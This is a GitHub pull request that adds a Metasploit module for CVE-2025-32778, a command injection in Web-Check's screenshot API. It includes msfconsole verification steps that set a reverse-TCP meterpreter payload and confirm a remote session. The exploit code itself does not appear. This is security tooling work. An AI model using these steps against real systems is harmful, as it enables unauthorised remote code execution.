Skip to content

Conversation

@Chocapikk
Copy link
Contributor

Hello Metasploit Team,

This PR adds an exploit module for CVE-2025-32778, a command injection vulnerability in Web-Check's screenshot API endpoint. The vulnerability allows unauthenticated remote code execution by injecting shell commands via URL query parameters in the /api/screenshot endpoint.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/multi/http/web_check_screenshot_rce
  • set RHOSTS <target_ip>
  • set RPORT 3000
  • set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
  • set LHOST <listener_ip>
  • run
  • Verify the module detects the vulnerability via timing-based check
  • Verify a meterpreter session is established
  • Verify commands can be executed in the session

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant